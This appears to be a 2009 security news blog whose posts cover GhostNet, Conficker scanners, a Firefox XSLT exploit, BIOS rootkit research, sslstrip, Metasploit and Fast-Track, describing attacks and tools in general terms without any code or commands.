Monday, March 30, 2009

103 Nations Compromised by Chinese Cyberspy Program Dubbed "GhostNet"

| Brett D. Arion |
Researchers affiliated with the Munk Centre for International Studies in Toronto, have published an extensive report on the activities of what seems to be a Chinese Spy Program they dub GhostNet. The investigation took place from June 2008 through March of 2009, and focused on allegations that China had engaged in systemic online espionage activities against the Tibetan community. GhostNet was spread through the use of a wide variety of Trojans, many of which were controlled through a program nicknamed gh0st RAT (Remote Access Tool).

Full Report can be reviewed here.

Since the report first surfaced, Chinese officials have publicly denied any involvement in publications such as the Chinese Daily.

Additional information can be found on the F-Secure webiste.

Researchers release PoC tools to find Conficker

| Brett D. Arion |
Released on Dan Kaminski's site today, was a Proof of Concept scanner to help people scan networks for the presence of the Conficker worm. Kaminski working with the Honeynet Project's Tillmann Werner and Felix Leder, have discovered that the worm actually changes the way that Windows looks on the network. What they found is that this allows anyone to ask the servers/systems on the network remotely, or anonymously if they are infected, and the systems will respond if they have been infected. The code has been released in python scripts as well as ported to a windows binary by Kaminski, and can be located at te link below.

Conficker Scanner PoC

In addition, it appears as if some of the Commercial security providers are actually joining in on the detection of the worm. Per Kaminski's site, "with the help of Securosis' Rich Mogull and the multivendor Conficker Working Group, enterprise-class scanners should already be out from Tenable (Nessus), McAfee/Foundstone, nmap, ncircle, and Qualys".

Given the hype of the anticipated April 1st event where the worm begins searching for updates, many are starting to wonder if this is an elaborate April Fools joke or if in fact it is real. Either way, it is highly recommended to ensure that all of your systems are patched, and run either the PoC code, or the Enterprise Class code avialable from the companies mentioned. There will be plenty of systems not updated that will continue to propogate the worm. In addition, given the discovery of the worm, it is expected that other malicious entities will begin to exploit the "openness" of Conficker to propogate their own maleware.

Thursday, March 26, 2009

Firefox XSLT exploit released to public. Mozilla announces fixes due out April 1st

| Brett D. Arion |
Update: Mozilla released the 3.0.8 update on Friday March 27, 2009.

Mozilla Security scrambled to address two critical security issues today. In a statement on the blog, Mozilla Security noted that the PWN2OWN bug discovered by Nils was reported to them via the Tippingpoint Zero Day initiative, but an XSLT bug was reported by Guido Landi on Mozilla stated that the fixes are undergoing quality testing and are to be included in the Firefox 3.0.8 update due on April 1st.

Mozilla Security Blog

XSLT Exploit

Security focus reference for XSLT Exploit

Tuesday, March 24, 2009

Chernobyl All Over Again?

| Brett D. Arion |
No no, this is not another nuclear disaster, this is more the boot-sector/BIOS invasion type incident. Since CIH (Chernobyl) broke out in 1998, manufacturers responded by write-protecting the system BIOS. That seemed to be sufficient until researchers from Core Security presented details at CanSecWest that they can replace the system BIOS on write-protected systems.

The demonstration showed that it is possible to replace the current system BIOS by loading a new hacked BIOS into flashrom, make some tweaks in settings, rework the checksums to ensure integrity checking passes, and then doing a flash. This ultimately would allow one to do just about anything with an infected system. There is a nagging question though, why go to all this trouble? There are much easier ways to take control of systems with a heck of a lot less effort. I also know some skeptics are saying "yeah right but it has to be executed"...actually this seems quite easy given the rate that people are installing malware disguised as Anti-Virus software, or other forms of software. Could it be that this is a stealthy way to keep control of machines longer than the normal bot infection?
Will the BIOS industry respond?
Can malware detection find it?

I guess only time will tell, but at least we can see that one thing is true, history always repeats itself.....oh the days of boot-sector and BIOS invasion attempts.....

Details of the Presentation can be found here, and the Abstract reads:

"When developing rootkits, one of the biggest problems is executing the malicious code, surviving reboots and remaining undetected. This talk will demonstrate how malicious code can be injected into commercial BIOS firmware. Instead of utilizing other rootkit methods which make use of the ACPI specification, Core Security has focused on a binary generic implementation independent of the installed OS to simulate how attackers can take control of a system."

Monday, March 23, 2009

Stolen information left in Google Cache

| Brett D. Arion |
According to recent accounts, an abandoned fraud site's payload of 20,000 plus credit cards ended up getting discovered in Goggle Cache pages. The site which was registered from within Vietnam included all of the information for the cards listed including the credit card number, expiration dates, and the names and addresses of the account holders. The cards were from major issuers such as Visa, Master Card, American Express, Solo, and Delta. According to some, the information was still available as of yesterday.

Google or any search engine that caches information is bound to hold this type of information. A well-formed query will quickly turn up such information in any search site, with Google ultimately holding the easiest ways to query site information (IMHO of course). A simply query I just did as I was posting this revealed some2680 results with many of the results having the same information listed here, or dumps for sale giving such information. The sites range anywhere from forums that have nothing to do with this information, to personal web pages.

You can see the original post on Slashdot by clicking here, but my question to all of you is how is this perceived as a Google issue? Should the blame be more focused on the hosting provider? Would the information have still been there when the next customer received the server image?

Sunday, March 22, 2009

IRS Director of Cybersecurity Operations, Devon Bryan, to give Webcast about Securing Sensitive But Unclassified/Personally Identifiable Information.

| Brett D. Arion |
Webcast is sponsored by Government Computer News (, and will be held on Wednesday March 25, 2009 at 2:00pm EST.

Click Here to attend at the designated time.

Also, if you are looking for resources on securing information systems, the Information Assurance Support Environment (IASE) division of the Defense Information Systems Agency (DISA) offers excellent guides, checklists, and tools. Site is

Friday, March 20, 2009

Beware: New Conficker Variant has been released

| Brett D. Arion |
I know everyone is probably getting tired of hearing about this one, but it is actually very neat to watch these propagate. It brings into reality the true number of people out there with computers that really have no idea as to what it means to update them and keep them as secure as possible. SRI International has updated their Conficker analysis to include the new "C" Variant addendum.

On a side note, If anyone is interested in running a honeypot for maleware and attack analysis, I would definitely recommend SRI's bothunter. It is fairly straightforward to get working. The only trouble I had was with getting SNORT to play nice with Ubuntu for some reason (probably one I caused). I actually ran it for some time before switching over to the DSHIELD WebHoneypot, mostly because I have followed DSHIELD for some time and just wanted to see how thier project worked.

Feel free to post any experience you have had with Conficker or Honeypots in the comments section....

More Amazing content from CanSecWest: Presenters demonstrate the ability to sniff keystrokes via a laser and keyboard power

| Brett D. Arion |
Researchers and hackers never cease to amaze me with the things they come up with. We've all heard of TEMPEST in the past that allows someone to tell what is actually being displayed on a monitor by having a slew of sophisticated equipment pointed at a monitor measuring the electromagnetic radiation, but now it seems that it is possible to sniff: "keystroke vibrations using a laser trained on a shiny laptop or through electrical signals coming from a PC connected to a PS/2 keyboard and plugged into a socket." You can read the post from CNET here.

Leave us a comment and tell us of any unusual methods you have used during an engagement, or what would be some other possible avenues of hacking that have yet to be thought of.....I personally am waiting for the "lie-to-me" facial recognition effect....My boss can tell when I'm not working by having a camera trained on my face and seeing JOY instead of DISGUST...(a little humor there, I LOVE my job..;P )

Thursday, March 19, 2009

EC-Council announces a US$100,000 allocation toward an Information Security scholarship fund through EC-Council| Secure Aid™

| Brett D. Arion |
I know I can't do this one justice, so I am just going to do a direct link.

SecureAid site:


EC-Council| Secure Aid™ the brainchild of EC-Council, strives to provide a platform for the attainment of knowledge regardless of certification affiliation and aims to support national and global security measures on combating cyber crime and cyber terrorism. EC-Council welcomes outstanding individuals who have contributed meaningfully in the IT Security domain and possess the desire to update their information security certification skills to apply for EC-Council’s scholarship. We hope to alleviate the pain of some information security professionals that have been affected by the global economic crisis and at the same time, we hope to empower the information security community and the world at large to fight cyber crime and cyber warfare.

We are proud to be vendor neutral and independent in our pursuit of empowering knowledge seekers to uphold the sanctity of their information security assets and in ensuring that every certified professional upholds the best practices in penetration testing and be in the forefront of the industry’s compliant requirements.

Therefore, EC-Council pursues with vigor the following objectives:

  • To serve our community by remaining a vendor neutral information security certification body and education provider
  • To foster excellent research skills in the field of information security
  • To encourage the development of ethical behavior within our certified community
  • To sustain creativity in implementing, managing and solving IT security related issues

Scope of Scholarship

Enrolment in the following choice of courses:

1. EC-Council Certified Ethical Hacker (C|EH);

2. EC-Council Computer Hacking Forensic Investigator (C|HFI);

3. EC-Council Certified Security Analyst (E|CSA);

4. Licensed Penetration Tester (L|PT);

5. EC-Council Certified Disaster Recovery Professional (E|DRP)

Total of 40 full and partial scholarships available totaling US$100,000

Successful candidates shall be entitled to full or partial training fees and exam voucher waiver for year 2009/2010 excluding courseware. Please click HERE for details on tuition and related fees

Duration of courses offered – 5 day live, online, instructor led training. The courses are all approximately 36 instruction hours in length delivered either in four hour time blocks, twice a week in the evening for 5 weeks, or in 5 consecutive days in 8 hour time blocks

Courses to be administered through EC-Council’s iClass (Live, Online, Instructor-led)"

Metasploit3 Update - "Tons of new Mac OS X code from Dino Dai Zovi and Charlie Miller, more to follow "

| Brett D. Arion |
Seems the Metasploit team are adding Mac OS as a true target for Metasploit. Charlie Miller and Dino Dai Zovi showed off the new code at the CanSecWest conference where they reportedly they demonstrated one tool called "pic the vic" where they can actually take a picture of the victim with thier own camera. Now if that isn't cool...can you image getting a snapshot of Steve Jobs in his jammies? Check out the changeset page to see the details. According to the README: "These payloads are from "The Mac Hacker's Handbook" by Charlie Miller and Dino Dai Zovi (Wiley 2009)."

In additon, to showing off the new parts of Metasploit, it seems that Charlie Miller got a little bonus of $5000 and the MacBook that he hacked just minutes into the PWN2OWN contest. Seems this is the second year in a row that Charlie has done this...Way To Go Charlie!!!! Unfortunately Tippingpoint, one of the CanSecWest sponsors, asks the contestants to sign an NDA keeping them from publicly disclosing any vulnerabilities used in the contest. This is so Tippingpoint can then turn the vulnerabilities over to the vendors for patching before they go public.

Happy sure to post any shots from "pic the vic" for all to see....

Wednesday, March 18, 2009

Unicornscan Author Jack C. Louis Dies in Tragic fire at his home in Sweden

| Brett D. Arion |
A sad time for the security industry. Famed researcher and security genius Jack C. Louis has died in a tragic house fire this past weekend in Sweden. Jack is best known for writing the outstanding scan tool Unicornscan, and his latest tool Sockstress which was tied to research regarding the discovery of an inherent flaw in the TCP/IP protocol. More recently Jack was working as the lead security researcher for Outpost24, but has also worked with ISECOM on the Open Source Security Testing Methodology Manual (OSSTMM). Jack and his work will be sorely missed.....

(Note: There is not a lot of information about Jack on the web. If anyone has any additional information, please feel free to hit me up privately or add comments below. )

Search Terms Used: "Jack C. Louis", "", Sockstress, Unicornscan

Tuesday, March 17, 2009

Fast-Track: Pen-Testing made simple?

| Brett D. Arion |
Security Engineers are always looking for easier ways to perform penetration tests. Anyone that has been doing this job for any length of time, can remember the pre-Metasploit (or pre-Google if your hair is getting gray like mine) days when you had to really know your code in order to do proof of concept exploits or even the proven exploits. This type of engagement often meant hours tweaking code in order to effectively test the exploit.

OK, so what is my point you say?

Our profession, or hobby as it may be, has just received a shot in the arm and the next tool that will need to be in everyones toolkit, FAST-TRACK. Of course if you bill by the hour and not the job, you probably aren't very glad to see this....just on...

So what is FAST-TRACK?

Per the website:

" Fast-Track is a python based open-source project aimed at helping Penetration Testers in an effort to identify, exploit, and further penetrate a network. Fast-Track was originally conceived when I was on a penetration test and found that there was generally a lack of tools or automation in certain attacks that were normally extremely advanced and time consuming. In an effort to reproduce some of my advanced attacks and propagate it down to my team at SecureState, I ended up writing Fast-Track for the public. Many of the issues Fast-Track exploits are due to improper sanitizing of client-side data within web applications, patch management, or lack of hardening techniques. All of these are relatively simple to fix if you know what to look for, but as penetration testers are extremely common findings for us. Fast-Track arms the penetration tester with advanced attacks that in most cases have never been performed before. Sit back relax, crank open a can of jolt cola and enjoy the ride.

"LETS POP A BOX!!!!!!!!!" -Dave Kennedy"

Old veterans like myself often dislike to see tools like this as it makes the hours of tedious work we have done for years seem less worthwhile (only because we did not think to script the stuff ourselves), but ultimately we must commend people like Dave Kennedy with sharing his expertise and experience with the masses. So checking out this tool is a must, but be sure to visit the Wiki page for the tool as is explains the tool in great detail, and will assist you with getting through the setup much more effectively.

Lastly, there is an excellent video at the site as well that gives a great preview of the capabilities of Fast-Track and you can see it here.

Monday, March 16, 2009

sslstrip - Not just another way to mess with ssl

| Armando Romeo |
sslstrip is a research powered by Moxie Marlinspike presented at Blackhat DC 2009 that demonstrate an innovative and quite simple (to understand) way to read SSL traffic.

I spent yesterday night watching the amazing video of Moxie's speech. At first I thought it was just another ssl MITM attack tool. Instead it turned to be a completely new way of performing achieving the same result: reading SSL traffic.

The following two images will be clearer than many words:

1. This is the old sslsniff method:

sslsniff has been used by Alex Sotirov et al. for the MD5 collision project presented last 30th December.

2. This is the sslstrip method , A new kinf of man in the middle (to quote Moxie).

From client to hacker connection is kept on HTTP, while on the server side the connection is

The idea behind sslstrip downloadable here, is to revert SSL requests from client to target server into HTTP requests, thus forcing the client to send data not encrypting it.

This is possible, according to Moxie because there are usually 2 ways to turn a connection from http to https:
  1. 302 redirects
  2. clicking on links
So everytime sslstrip intercepts a request for an https resource (like login request), sslstrip initiates a secure connection to the target server and responds to the client with an html completely identical to the correspondent secure page retrieved from the target server.

The server will be unaware of the attacker being in the middle, while the attacker relies upon tricks to make client think that the page he views is secure.

Firefox, as shown in the presentation, no more exposes the location bar with a yellow background, while the lock favicon, usually shown in SSL connections, can be easily changed.

Results acting as a node in the Tor network:


Refer to the slides or the nice conference video for more detailed information on the attack.

Free Security Magazines